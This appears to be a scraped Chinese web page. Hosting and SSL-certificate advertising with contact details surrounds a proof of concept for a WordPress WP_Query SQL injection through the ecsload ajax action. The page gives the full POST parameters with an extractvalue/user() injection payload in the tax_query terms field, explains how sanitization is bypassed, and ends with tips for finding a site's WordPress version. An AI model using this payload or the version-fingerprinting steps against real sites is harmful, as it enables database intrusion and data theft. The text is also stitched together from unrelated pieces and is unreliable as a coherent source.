重庆分公司,新征程启航
为企业提供网站建设、域名注册、服务器等服务
当然支持,不过有些插件或主题需要在高PHP版本上才能运行,现在很多空间可以自由切换PHP版本,从PHP5.2到PHP7.0。看我兹料连系了解
开阳ssl适用于网站、小程序/APP、API接口等需要进行数据传输应用场景,ssl证书未来市场广阔!成为创新互联建站的ssl证书销售渠道,可以享受市场价格4-6折优惠!如果有意向欢迎电话联系或者加微信:18982081108(备注:SSL证书合作)期待与您的合作!
POC:
POST
ecs_ajax_settings {"post_id":1,"current_page":2,"widget_id":"65054a0","max_num_pages":5}
action ecsload
query {"tax_query":{"0":{"field":"term_taxonomy_id","terms":["111) and extractvalue(rand(),concat(0x5e,user(),0x5e))#"]}}
这个问题来源于temrs没过滤 再加上 一个相等条件绕过;
相等条件类似于,下面过滤条件没有执行。导致term携带了一些脏数据
if(a==b){
return;
}
sanialize(term);
1下图所示,我们的插件里action钩子勾住的是这个方法,这个方法利用了WP_QUERY存在漏洞的类,注意的是action 一定要有对应的值,所以这个漏洞限制在。运用了WP_QUERY的插件里。所以我们拿了ajax_pagnition这个插件,定义了action为ecsload
2 下图所示 我们进入方法,此方法构造了sql
3 clean query方法 进去看看,2的里面调用了这个,箭头指定的地方已经打过补丁,强制term为int所以就无法利用了,补丁前不是这样,而是对term没有做任何操作
4进入transform_query,在看一下里面。下面试sanitize其实可以绕过,从而不过滤term这样,条件都成立,term逃出,sql成立
这里介绍三种方法。
1进入后台“仪表盘”,该页面的左上角图片显示了wordpress的版本号。
2 查看网页源代码 在网站的主页空白处点右键弹出菜单,选择“查看网页源代码”。 在出现的源码页面里查找 meta name="generator" content= Content值就是wordpress的版本号。
3 查看readme文件 进入wampsever的www目录下网站文件所在的文件夹 (一般为“C:\wamp\www\example.com”),打开“readme”,该文件的正上方显著的位置写着wordpress的版本。